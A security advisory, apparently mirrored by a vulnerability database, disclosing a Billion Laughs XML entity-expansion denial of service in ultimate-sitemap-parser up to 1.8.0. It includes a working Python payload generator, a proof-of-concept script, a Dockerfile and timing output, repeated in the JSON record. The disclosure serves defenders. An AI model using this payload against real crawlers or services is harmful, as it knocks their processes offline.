GHSA-P5WC-9W9R-M232
Vulnerability from github – Published: 2026-06-19 21:15 – Updated: 2026-06-19 21:15XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser
Summary
ultimate-sitemap-parser version 1.8.0 and earlier parse attacker-controlled XML content using Python's xml.parsers.expat without any restriction on DTD declarations or recursive entity references. An attacker who can serve a malicious sitemap can trigger exponential XML entity expansion (the "Billion Laughs" attack), causing unbounded CPU and memory consumption in the victim process. No authentication, user interaction, or special configuration is required — the vulnerability is exploitable by default through any public-facing use of sitemap_tree_for_homepage() or sitemap_from_str().
Details
The vulnerable code path begins at the public API entry points and flows to the Expat XML parser without any sanitization:
usp/tree.py:42—sitemap_tree_for_homepage(homepage_url)is the primary public entry point.usp/tree.py:133—sitemap_from_str(content)is the secondary public entry point (also directly reachable from user code).usp/fetch_parse.py:141-145—SitemapFetcher._fetch()retrieves the remote URL content.usp/fetch_parse.py:175— The raw response becomesresponse_content(taint propagation point).usp/fetch_parse.py:441-450—XMLSitemapParser.sitemap()creates an Expat parser and feeds the attacker-controlled content directly to it:
# usp/fetch_parse.py:441-450 — VULNERABLE SINK
parser = xml.parsers.expat.ParserCreate(
namespace_separator=self.__XML_NAMESPACE_SEPARATOR
)
# ... handler assignments ...
parser.Parse(self._content, is_final) # <-- no DTD/entity restriction
A full audit of the usp/ directory confirms that none of the following hardening measures are present:
- defusedxml usage
- DOCTYPE rejection
- SetParamEntityParsing
- UseForeignDTD
- ExternalEntityRefHandler
When a Billion Laughs payload is parsed, each nested entity reference is expanded recursively, multiplying the in-memory string by a factor of 10 per nesting level. At level 6 (10⁶ expansions), processing time exceeds 20 seconds, effectively hanging the calling process.
PoC
Environment setup:
# Option A: install from PyPI
python -m venv /tmp/usp-poc
. /tmp/usp-poc/bin/activate
pip install ultimate-sitemap-parser==1.8.0
# Option B: Docker (using the provided Dockerfile)
docker build -t vuln-001-usp -f vuln-001/Dockerfile .
docker run --rm vuln-001-usp
Attack payload and execution:
from usp.tree import sitemap_from_str
import time, signal
TIMEOUT = 20
class TimedOut(Exception): pass
def handler(s, f): raise TimedOut()
def build_payload(level):
lines = ['<?xml version="1.0"?>', '<!DOCTYPE x [']
lines.append(' <!ENTITY lol "lol">')
for i in range(1, level + 1):
prev = "lol" if i == 1 else f"lol{i-1}"
expansion = "".join(f"&{prev};" for _ in range(10))
lines.append(f' <!ENTITY lol{i} "{expansion}">')
lines.append(']>')
lines.append('<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">')
lines.append(f' <url><loc>http://example.com/&lol{level};</loc></url>')
lines.append('</urlset>')
return "\n".join(lines)
for level in [3, 4, 5, 6]:
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
t = time.perf_counter()
try:
result = sitemap_from_str(build_payload(level))
elapsed = time.perf_counter() - t
signal.alarm(0)
pages = list(result.all_pages())
url_len = len(pages[0].url) if pages else 0
print(f"Level {level}: {elapsed:.4f}s url_len={url_len:,}")
except TimedOut:
elapsed = time.perf_counter() - t
signal.alarm(0)
print(f"Level {level}: TIMEOUT after {elapsed:.1f}s -- DoS confirmed")
Expected output (observed during dynamic reproduction):
Level 3 (10^3): 0.0054s url_len=3,019
Level 4 (10^4): 0.0321s url_len=30,019
Level 5 (10^5): 5.2845s url_len=300,019
Level 6 (10^6): TIMEOUT after 20.0011s -- DoS confirmed
Processing time grows exponentially: level 5 is ~165× slower than level 4, and level 6 exceeds the 20-second watchdog. This conclusively demonstrates unbounded resource consumption.
Impact
This is a Denial-of-Service (DoS) vulnerability via XML Entity Expansion (the "Billion Laughs" / CWE-776 pattern). Any application or service that uses ultimate-sitemap-parser to crawl external or user-supplied URLs is impacted.
Who is affected:
- Web crawlers and indexers that call sitemap_tree_for_homepage() against arbitrary URLs — a single malicious sitemap server can lock up the crawler process.
- CI/CD pipelines and monitoring tools that periodically parse sitemaps as part of automated workflows.
- Any application that passes unvalidated user input to sitemap_from_str().
Because no authentication, elevated privilege, or prior relationship is required (CVSS PR:N, UI:N), the attack surface is broad. An attacker only needs to operate a web server that returns a malicious sitemap when visited.
Reproduction artifacts
Dockerfile
FROM python:3.11-slim
LABEL description="VULN-001: XML Entity Expansion (Billion Laughs) DoS PoC" \
target="GateNLP/ultimate-sitemap-parser <= 1.8.0" \
cwe="CWE-776"
WORKDIR /app
# Copy the cloned repository first
COPY repo/ /app/repo/
# Install uv_build (required build backend) then install the vulnerable package from the local clone
RUN pip install --no-cache-dir "uv_build>=0.9.6,<0.10.0" && \
pip install --no-cache-dir /app/repo/
# Copy the PoC script
COPY vuln-001/poc.py /app/poc.py
CMD ["python3", "-u", "/app/poc.py"]
poc.py
#!/usr/bin/env python3
"""
PoC for VULN-001: XML Entity Expansion (Billion Laughs) DoS
Affected: GateNLP/ultimate-sitemap-parser <= 1.8.0
CWE-776: Improper Restriction of Recursive Entity References in DTDs
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5 High)
Sink: usp/fetch_parse.py:450
parser = xml.parsers.expat.ParserCreate(namespace_separator=...)
parser.Parse(self._content, is_final) <- no DTD/entity restriction
Entry: usp.tree.sitemap_from_str(content: str) -> AbstractSitemap
"""
import signal
import sys
import time
from usp.tree import sitemap_from_str
TIMEOUT_SECONDS = 20
DOS_THRESHOLD_SECONDS = 2.0 # level 5 must exceed this to PASS
class TimedOut(Exception):
pass
def _alarm_handler(signum, frame):
raise TimedOut("SIGALRM fired")
def build_billion_laughs_payload(level: int) -> str:
"""Build a Billion Laughs XML payload nested to `level` depth.
Each level multiplies expansion by 10:
level 3 -> 10^3 = 1,000 chars
level 4 -> 10^4 = 10,000 chars
level 5 -> 10^5 = 100,000 chars
level 6 -> 10^6 = 1,000,000 chars
"""
lines = ['<?xml version="1.0"?>', "<!DOCTYPE x ["]
lines.append(' <!ENTITY lol "lol">')
for i in range(1, level + 1):
prev = "lol" if i == 1 else f"lol{i - 1}"
expansion = "".join(f"&{prev};" for _ in range(10))
lines.append(f' <!ENTITY lol{i} "{expansion}">')
lines.append("]>")
lines.append('<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">')
lines.append(f" <url><loc>http://example.com/&lol{level};</loc></url>")
lines.append("</urlset>")
return "\n".join(lines)
def parse_with_timeout(payload: str):
"""Parse payload under SIGALRM watchdog; return (elapsed, url_len, timed_out)."""
signal.signal(signal.SIGALRM, _alarm_handler)
signal.alarm(TIMEOUT_SECONDS)
start = time.perf_counter()
timed_out = False
url_len = 0
try:
result = sitemap_from_str(payload)
elapsed = time.perf_counter() - start
signal.alarm(0)
pages = list(result.all_pages())
if pages:
url_len = len(pages[0].url)
except TimedOut:
elapsed = time.perf_counter() - start
timed_out = True
signal.alarm(0)
except Exception as exc:
elapsed = time.perf_counter() - start
signal.alarm(0)
print(f" [EXCEPTION] {type(exc).__name__}: {exc}", flush=True)
return elapsed, url_len, timed_out
def main() -> int:
print("=" * 64)
print("VULN-001 XML Entity Expansion DoS (Billion Laughs)")
print("Target : GateNLP/ultimate-sitemap-parser <= 1.8.0")
print("Sink : usp/fetch_parse.py:450 parser.Parse(_content)")
print(f"Timeout: {TIMEOUT_SECONDS}s per level")
print("=" * 64)
results = {}
for level in [3, 4, 5, 6]:
theoretical = 10**level
payload = build_billion_laughs_payload(level)
print(
f"\n[*] Level {level}: 10^{level} = {theoretical:>10,} chars "
f"payload_bytes={len(payload)}",
flush=True,
)
elapsed, url_len, timed_out = parse_with_timeout(payload)
results[level] = (elapsed, url_len, timed_out)
if timed_out:
print(
f"[!] Level {level}: TIMED OUT after {elapsed:.1f}s "
f"(>{TIMEOUT_SECONDS}s) -- DoS confirmed",
flush=True,
)
else:
print(
f"[+] Level {level}: completed in {elapsed:.4f}s "
f"url_len={url_len:,}",
flush=True,
)
print("\n" + "=" * 64)
print("TIMING SUMMARY")
print("=" * 64)
for lvl, (elapsed, url_len, timed_out) in results.items():
status = f"TIMEOUT >{TIMEOUT_SECONDS}s" if timed_out else f"{elapsed:.4f}s"
print(f" Level {lvl} (10^{lvl:>1}): {status:>20} url_len={url_len:,}")
print()
# Verdict: level 5 must take >2s or level 6 must time out
lvl5_elapsed, _, lvl5_timed_out = results.get(5, (0, 0, False))
lvl6_elapsed, _, lvl6_timed_out = results.get(6, (0, 0, False))
slow_evidence = lvl5_elapsed > DOS_THRESHOLD_SECONDS or lvl5_timed_out
timeout_evidence = lvl6_timed_out or lvl6_elapsed > DOS_THRESHOLD_SECONDS
if slow_evidence or timeout_evidence:
print("[PASS] DoS CONFIRMED: exponential CPU exhaustion via XML entity expansion")
print(
f" level-5 time={lvl5_elapsed:.4f}s level-6 "
+ ("TIMEOUT" if lvl6_timed_out else f"time={lvl6_elapsed:.4f}s")
)
print("[PASS] CWE-776 Billion Laughs confirmed in ultimate-sitemap-parser <= 1.8.0")
return 0
else:
print("[FAIL] Timing did not show significant slowdown -- DoS not confirmed")
print(f" level-5={lvl5_elapsed:.4f}s level-6={lvl6_elapsed:.4f}s")
print(" (expected level-5 > 2s or level-6 to time out)")
return 1
if __name__ == "__main__":
sys.exit(main())
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.8.0"
},
"package": {
"ecosystem": "PyPI",
"name": "ultimate-sitemap-parser"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.8.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-776"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-19T21:15:36Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser\n\n### Summary\n\n`ultimate-sitemap-parser` version 1.8.0 and earlier parse attacker-controlled XML content using Python\u0027s `xml.parsers.expat` without any restriction on DTD declarations or recursive entity references. An attacker who can serve a malicious sitemap can trigger exponential XML entity expansion (the \"Billion Laughs\" attack), causing unbounded CPU and memory consumption in the victim process. No authentication, user interaction, or special configuration is required \u2014 the vulnerability is exploitable by default through any public-facing use of `sitemap_tree_for_homepage()` or `sitemap_from_str()`.\n\n### Details\n\nThe vulnerable code path begins at the public API entry points and flows to the Expat XML parser without any sanitization:\n\n1. **`usp/tree.py:42`** \u2014 `sitemap_tree_for_homepage(homepage_url)` is the primary public entry point.\n2. **`usp/tree.py:133`** \u2014 `sitemap_from_str(content)` is the secondary public entry point (also directly reachable from user code).\n3. **`usp/fetch_parse.py:141-145`** \u2014 `SitemapFetcher._fetch()` retrieves the remote URL content.\n4. **`usp/fetch_parse.py:175`** \u2014 The raw response becomes `response_content` (taint propagation point).\n5. **`usp/fetch_parse.py:441-450`** \u2014 `XMLSitemapParser.sitemap()` creates an Expat parser and feeds the attacker-controlled content directly to it:\n\n```python\n# usp/fetch_parse.py:441-450 \u2014 VULNERABLE SINK\nparser = xml.parsers.expat.ParserCreate(\n namespace_separator=self.__XML_NAMESPACE_SEPARATOR\n)\n# ... handler assignments ...\nparser.Parse(self._content, is_final) # \u003c-- no DTD/entity restriction\n```\n\nA full audit of the `usp/` directory confirms that none of the following hardening measures are present:\n- `defusedxml` usage\n- DOCTYPE rejection\n- `SetParamEntityParsing`\n- `UseForeignDTD`\n- `ExternalEntityRefHandler`\n\nWhen a Billion Laughs payload is parsed, each nested entity reference is expanded recursively, multiplying the in-memory string by a factor of 10 per nesting level. At level 6 (10\u2076 expansions), processing time exceeds 20 seconds, effectively hanging the calling process.\n\n### PoC\n\n**Environment setup:**\n\n```bash\n# Option A: install from PyPI\npython -m venv /tmp/usp-poc\n. /tmp/usp-poc/bin/activate\npip install ultimate-sitemap-parser==1.8.0\n```\n\n```bash\n# Option B: Docker (using the provided Dockerfile)\ndocker build -t vuln-001-usp -f vuln-001/Dockerfile .\ndocker run --rm vuln-001-usp\n```\n\n**Attack payload and execution:**\n\n```python\nfrom usp.tree import sitemap_from_str\nimport time, signal\n\nTIMEOUT = 20\n\nclass TimedOut(Exception): pass\ndef handler(s, f): raise TimedOut()\n\ndef build_payload(level):\n lines = [\u0027\u003c?xml version=\"1.0\"?\u003e\u0027, \u0027\u003c!DOCTYPE x [\u0027]\n lines.append(\u0027 \u003c!ENTITY lol \"lol\"\u003e\u0027)\n for i in range(1, level + 1):\n prev = \"lol\" if i == 1 else f\"lol{i-1}\"\n expansion = \"\".join(f\"\u0026{prev};\" for _ in range(10))\n lines.append(f\u0027 \u003c!ENTITY lol{i} \"{expansion}\"\u003e\u0027)\n lines.append(\u0027]\u003e\u0027)\n lines.append(\u0027\u003curlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\"\u003e\u0027)\n lines.append(f\u0027 \u003curl\u003e\u003cloc\u003ehttp://example.com/\u0026lol{level};\u003c/loc\u003e\u003c/url\u003e\u0027)\n lines.append(\u0027\u003c/urlset\u003e\u0027)\n return \"\\n\".join(lines)\n\nfor level in [3, 4, 5, 6]:\n signal.signal(signal.SIGALRM, handler)\n signal.alarm(TIMEOUT)\n t = time.perf_counter()\n try:\n result = sitemap_from_str(build_payload(level))\n elapsed = time.perf_counter() - t\n signal.alarm(0)\n pages = list(result.all_pages())\n url_len = len(pages[0].url) if pages else 0\n print(f\"Level {level}: {elapsed:.4f}s url_len={url_len:,}\")\n except TimedOut:\n elapsed = time.perf_counter() - t\n signal.alarm(0)\n print(f\"Level {level}: TIMEOUT after {elapsed:.1f}s -- DoS confirmed\")\n```\n\n**Expected output (observed during dynamic reproduction):**\n\n```\nLevel 3 (10^3): 0.0054s url_len=3,019\nLevel 4 (10^4): 0.0321s url_len=30,019\nLevel 5 (10^5): 5.2845s url_len=300,019\nLevel 6 (10^6): TIMEOUT after 20.0011s -- DoS confirmed\n```\n\nProcessing time grows exponentially: level 5 is ~165\u00d7 slower than level 4, and level 6 exceeds the 20-second watchdog. This conclusively demonstrates unbounded resource consumption.\n\n### Impact\n\nThis is a **Denial-of-Service (DoS)** vulnerability via XML Entity Expansion (the \"Billion Laughs\" / CWE-776 pattern). Any application or service that uses `ultimate-sitemap-parser` to crawl external or user-supplied URLs is impacted.\n\n**Who is affected:**\n- **Web crawlers and indexers** that call `sitemap_tree_for_homepage()` against arbitrary URLs \u2014 a single malicious sitemap server can lock up the crawler process.\n- **CI/CD pipelines and monitoring tools** that periodically parse sitemaps as part of automated workflows.\n- **Any application** that passes unvalidated user input to `sitemap_from_str()`.\n\nBecause no authentication, elevated privilege, or prior relationship is required (CVSS PR:N, UI:N), the attack surface is broad. An attacker only needs to operate a web server that returns a malicious sitemap when visited.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\nFROM python:3.11-slim\n\nLABEL description=\"VULN-001: XML Entity Expansion (Billion Laughs) DoS PoC\" \\\n target=\"GateNLP/ultimate-sitemap-parser \u003c= 1.8.0\" \\\n cwe=\"CWE-776\"\n\nWORKDIR /app\n\n# Copy the cloned repository first\nCOPY repo/ /app/repo/\n\n# Install uv_build (required build backend) then install the vulnerable package from the local clone\nRUN pip install --no-cache-dir \"uv_build\u003e=0.9.6,\u003c0.10.0\" \u0026\u0026 \\\n pip install --no-cache-dir /app/repo/\n\n# Copy the PoC script\nCOPY vuln-001/poc.py /app/poc.py\n\nCMD [\"python3\", \"-u\", \"/app/poc.py\"]\n```\n\n#### `poc.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPoC for VULN-001: XML Entity Expansion (Billion Laughs) DoS\nAffected: GateNLP/ultimate-sitemap-parser \u003c= 1.8.0\nCWE-776: Improper Restriction of Recursive Entity References in DTDs\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5 High)\n\nSink: usp/fetch_parse.py:450\n parser = xml.parsers.expat.ParserCreate(namespace_separator=...)\n parser.Parse(self._content, is_final) \u003c- no DTD/entity restriction\n\nEntry: usp.tree.sitemap_from_str(content: str) -\u003e AbstractSitemap\n\"\"\"\n\nimport signal\nimport sys\nimport time\n\nfrom usp.tree import sitemap_from_str\n\nTIMEOUT_SECONDS = 20\nDOS_THRESHOLD_SECONDS = 2.0 # level 5 must exceed this to PASS\n\n\nclass TimedOut(Exception):\n pass\n\n\ndef _alarm_handler(signum, frame):\n raise TimedOut(\"SIGALRM fired\")\n\n\ndef build_billion_laughs_payload(level: int) -\u003e str:\n \"\"\"Build a Billion Laughs XML payload nested to `level` depth.\n\n Each level multiplies expansion by 10:\n level 3 -\u003e 10^3 = 1,000 chars\n level 4 -\u003e 10^4 = 10,000 chars\n level 5 -\u003e 10^5 = 100,000 chars\n level 6 -\u003e 10^6 = 1,000,000 chars\n \"\"\"\n lines = [\u0027\u003c?xml version=\"1.0\"?\u003e\u0027, \"\u003c!DOCTYPE x [\"]\n lines.append(\u0027 \u003c!ENTITY lol \"lol\"\u003e\u0027)\n for i in range(1, level + 1):\n prev = \"lol\" if i == 1 else f\"lol{i - 1}\"\n expansion = \"\".join(f\"\u0026{prev};\" for _ in range(10))\n lines.append(f\u0027 \u003c!ENTITY lol{i} \"{expansion}\"\u003e\u0027)\n lines.append(\"]\u003e\")\n lines.append(\u0027\u003curlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\"\u003e\u0027)\n lines.append(f\" \u003curl\u003e\u003cloc\u003ehttp://example.com/\u0026lol{level};\u003c/loc\u003e\u003c/url\u003e\")\n lines.append(\"\u003c/urlset\u003e\")\n return \"\\n\".join(lines)\n\n\ndef parse_with_timeout(payload: str):\n \"\"\"Parse payload under SIGALRM watchdog; return (elapsed, url_len, timed_out).\"\"\"\n signal.signal(signal.SIGALRM, _alarm_handler)\n signal.alarm(TIMEOUT_SECONDS)\n start = time.perf_counter()\n timed_out = False\n url_len = 0\n try:\n result = sitemap_from_str(payload)\n elapsed = time.perf_counter() - start\n signal.alarm(0)\n pages = list(result.all_pages())\n if pages:\n url_len = len(pages[0].url)\n except TimedOut:\n elapsed = time.perf_counter() - start\n timed_out = True\n signal.alarm(0)\n except Exception as exc:\n elapsed = time.perf_counter() - start\n signal.alarm(0)\n print(f\" [EXCEPTION] {type(exc).__name__}: {exc}\", flush=True)\n return elapsed, url_len, timed_out\n\n\ndef main() -\u003e int:\n print(\"=\" * 64)\n print(\"VULN-001 XML Entity Expansion DoS (Billion Laughs)\")\n print(\"Target : GateNLP/ultimate-sitemap-parser \u003c= 1.8.0\")\n print(\"Sink : usp/fetch_parse.py:450 parser.Parse(_content)\")\n print(f\"Timeout: {TIMEOUT_SECONDS}s per level\")\n print(\"=\" * 64)\n\n results = {}\n for level in [3, 4, 5, 6]:\n theoretical = 10**level\n payload = build_billion_laughs_payload(level)\n print(\n f\"\\n[*] Level {level}: 10^{level} = {theoretical:\u003e10,} chars \"\n f\"payload_bytes={len(payload)}\",\n flush=True,\n )\n elapsed, url_len, timed_out = parse_with_timeout(payload)\n results[level] = (elapsed, url_len, timed_out)\n\n if timed_out:\n print(\n f\"[!] Level {level}: TIMED OUT after {elapsed:.1f}s \"\n f\"(\u003e{TIMEOUT_SECONDS}s) -- DoS confirmed\",\n flush=True,\n )\n else:\n print(\n f\"[+] Level {level}: completed in {elapsed:.4f}s \"\n f\"url_len={url_len:,}\",\n flush=True,\n )\n\n print(\"\\n\" + \"=\" * 64)\n print(\"TIMING SUMMARY\")\n print(\"=\" * 64)\n for lvl, (elapsed, url_len, timed_out) in results.items():\n status = f\"TIMEOUT \u003e{TIMEOUT_SECONDS}s\" if timed_out else f\"{elapsed:.4f}s\"\n print(f\" Level {lvl} (10^{lvl:\u003e1}): {status:\u003e20} url_len={url_len:,}\")\n\n print()\n\n # Verdict: level 5 must take \u003e2s or level 6 must time out\n lvl5_elapsed, _, lvl5_timed_out = results.get(5, (0, 0, False))\n lvl6_elapsed, _, lvl6_timed_out = results.get(6, (0, 0, False))\n\n slow_evidence = lvl5_elapsed \u003e DOS_THRESHOLD_SECONDS or lvl5_timed_out\n timeout_evidence = lvl6_timed_out or lvl6_elapsed \u003e DOS_THRESHOLD_SECONDS\n\n if slow_evidence or timeout_evidence:\n print(\"[PASS] DoS CONFIRMED: exponential CPU exhaustion via XML entity expansion\")\n print(\n f\" level-5 time={lvl5_elapsed:.4f}s level-6 \"\n + (\"TIMEOUT\" if lvl6_timed_out else f\"time={lvl6_elapsed:.4f}s\")\n )\n print(\"[PASS] CWE-776 Billion Laughs confirmed in ultimate-sitemap-parser \u003c= 1.8.0\")\n return 0\n else:\n print(\"[FAIL] Timing did not show significant slowdown -- DoS not confirmed\")\n print(f\" level-5={lvl5_elapsed:.4f}s level-6={lvl6_elapsed:.4f}s\")\n print(\" (expected level-5 \u003e 2s or level-6 to time out)\")\n return 1\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n```",
"id": "GHSA-p5wc-9w9r-m232",
"modified": "2026-06-19T21:15:36Z",
"published": "2026-06-19T21:15:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/GateNLP/ultimate-sitemap-parser/security/advisories/GHSA-p5wc-9w9r-m232"
},
{
"type": "PACKAGE",
"url": "https://github.com/GateNLP/ultimate-sitemap-parser"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Ultimate Sitemap Parser (USP): XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.